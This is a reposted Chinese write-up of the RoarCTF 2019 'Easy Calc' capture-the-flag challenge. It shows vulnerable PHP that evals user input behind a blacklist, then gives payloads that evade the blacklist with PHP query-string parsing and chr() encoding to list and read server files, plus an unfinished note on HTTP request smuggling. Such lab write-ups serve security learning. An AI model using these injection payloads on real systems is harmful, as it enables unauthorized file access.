BUUCTF-[RoarCTF 2019]Easy Calc1
Posted _Monica_
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF-[RoarCTF 2019]Easy Calc1相关的知识,希望对你有一定的参考价值。
目录
题目:
页面应该是一个计算器,其他的没有什么发现,日常查看源代码:
访问calc.php,发现源码:
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\\t', '\\r', '\\n','\\'', '"', '`', '\\[', '\\]','\\$','\\\\','\\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>
方法一:
知识点:
m | multi line - 多行匹配 | 使边界字符 ^ 和 $ 匹配每一行的开头和结尾,记住是多行,而不是整个字符串的开头和结尾。 |
利用PHP的字符串解析特性Bypass - FreeBuf网络安全行业门户
分析:
经测试,get传入的num值不能为字母,只是在显示的代码里面我们看不见。
但利用php字符串解析特性我们可以:
payload:
? num=print_r(scandir(chr(47)));
这里由于单引号被过滤了,那就用chr()绕过,chr(47)就是斜杠/
print_r()可以换成var_dump()
? num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));
chr(47)='/'
chr(102)='f'
chr(49)='l'
chr(97)='a'
chr(103)='g'
chr(103)='g'
方法二
知识点:
http:Content-Length与Transfer-Encoding
在HTTP协议中,Content-Length用于描述HTTP消息实体的传输长度the transfer-length of the message-body。在HTTP协议中,消息实体长度和消息实体的传输长度是有区别,比如说gzip压缩下,消息实体长度是压缩前的长度,消息实体的传输长度是gzip压缩后的长度。
在具体的HTTP交互中,客户端是如何获取消息长度的呢,主要基于以下几个规则:
响应为1xx,204,304相应或者head请求,则直接忽视掉消息实体内容。
如果有Transfer-Encoding,则优先采用Transfer-Encoding里面的方法来找到对应的长度。比如说Chunked模式。
“如果head中有Content-Length,那么这个Content-Length既表示实体长度,又表示传输长度。如果实体长度和传输长度不相等(比如说设置了Transfer-Encoding),那么则不能设置Content-Length。如果设置了Transfer-Encoding,那么Content-Length将被忽视”。
通过服务器关闭连接能确定消息的传输长度。(请求端不能通过关闭连接来指明请求消息体的结束,因为这样可以让服务器没有机会继续给予响应)。这种情况主要对应为短连接,即非keep-alive模式。
403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用,服务器理解客户的请求,但拒绝处理它,通常由于服务器上文件或目录的权限设置导致的WEB访问错误。
输入字母的时候,会发现显示403错误。
细节暂时还不会。。。
以上是关于BUUCTF-[RoarCTF 2019]Easy Calc1的主要内容,如果未能解决你的问题,请参考以下文章
Buuctf-Reverse(逆向) [RoarCTF2019]Polyre && SangFor(深育杯)-Reverse(逆向) XOR_Exercise Write up(代码片